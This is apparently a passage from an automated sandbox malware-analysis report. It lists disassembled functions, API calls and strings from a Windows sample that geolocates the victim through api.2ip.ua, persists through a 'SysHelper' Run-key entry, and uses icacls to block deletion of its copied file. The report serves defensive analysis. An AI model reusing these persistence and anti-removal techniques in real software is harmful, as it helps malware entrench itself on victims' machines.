40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                        Strings
                                                                                                                                        • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                        • "country_code":", xrefs: 0040CFE1
                                                                                                                                        • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                        • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                        • API String ID: 1485416377-2962370585
                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                        • _memset.LIBCMT ref: 00411D3B
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                        • _memset.LIBCMT ref: 00412090
                                                                                                                                        • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                        • _memset.LIBCMT ref: 00412120
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 004235B1
                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                        • __allrem.LIBCMT ref: 004236F3
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                        • __allrem.LIBCMT ref: 00423726
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                        • __allrem.LIBCMT ref: 0042375B
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                                                        APIs
                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                                                          • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                                                          • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                        • String ID: i;B
                                                                                                                                        • API String ID: 2427264223-472376889
                                                                                                                                        • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                        • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                                                        • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                        • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1063 40ef50-40ef7a call 420c62 1066 40efdc-40efe2 1063->1066 1067 40ef7c 1063->1067 1068 40ef80-40ef85 call 420c62 1067->1068 1070 40ef8a-40efbd call 42b420 1068->1070 1073 40efc0-40efcf 1070->1073 1073->1073 1074 40efd1-40efda 1073->1074 1074->1066 1074->1068
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 0040EF69
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • _malloc.LIBCMT ref: 0040EF85
                                                                                                                                        • _memset.LIBCMT ref: 0040EF9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3655941445-0
                                                                                                                                        • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                                                        • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                                                        • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                                                        • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1075 42fb64-42fb77 call 428520 1078 42fba5-42fbaa call 428565 1075->1078 1079 42fb79-42fb8c call 428af7 1075->1079 1084 42fb99-42fba0 call 42fbab 1079->1084 1085 42fb8e call 42fe47 1079->1085 1084->1078 1088 42fb93 1085->1088 1088->1084
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                          • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                          • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                          • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                        • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                          • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                          • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                          • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                          • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                          • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                          • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1282695788-0
                                                                                                                                        • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                        • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                        • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                        • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1089 427f3d-427f47 call 427e0e 1091 427f4c-427f50 1089->1091
                                                                                                                                        APIs
                                                                                                                                        • _doexit.LIBCMT ref: 00427F47
                                                                                                                                          • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                          • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                          • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                          • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2158581194-0
                                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                        • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                        • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                        • _memset.LIBCMT ref: 004110CA
                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                        • _malloc.LIBCMT ref: 00411100
                                                                                                                                        • _memset.LIBCMT ref: 0041110B
                                                                                                                                        • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                        • String ID: %.2X
                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                        • Opcode ID: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                                                                                                                                        • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                        • Opcode Fuzzy Hash: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
                                                                                                                                        • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                        • _memset.LIBCMT ref: 004119B8
                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                          • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
